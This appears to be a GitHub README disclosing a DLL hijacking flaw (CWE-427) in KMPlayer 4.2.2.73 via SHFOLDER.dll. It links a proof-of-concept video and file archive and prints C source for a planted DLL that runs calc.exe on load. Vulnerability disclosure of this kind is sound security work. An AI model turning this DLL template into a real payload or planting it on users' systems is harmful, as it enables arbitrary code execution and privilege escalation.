Skip to content

10cksYiqiyinHangzhouTechnology/KMPlayer_Poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
README.md
README.md
 
 

Repository files navigation

KMPlayer_Poc

Vendor of the product

PandoraTV.

The name of an affected Product

KMPlayer x32

Affected version

KMPlayer_4.2.2.73(Latest)

Product download address

https://www.kmplayer.com/pc

Description

KMPlayer was discovered to contain a DLL hijacking vulnerability that allows attackers to escalate privileges and execute arbitrary code via a crafted DLL.

Affected component

SHFOLDER.dll

Vulnerability type

CWE-427: Uncontrolled Search Path Element

DLL planting vulnerability type

Current Working Directory (CWD) DLL planting 

POC video

Youtube

POC files download

https://drive.google.com/file/d/1bdYaDmtWhnjaHkzv3bZ4PUSMzDJ8JjSV/view?usp=sharing

kmp32# tree
.
├── KMPlayer_4.2.2.73.exe
├── KMPlayer_poc.mp4
└── SHFOLDER.dll

Poc source code

// dllmain.cpp
#include "pch.h"
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published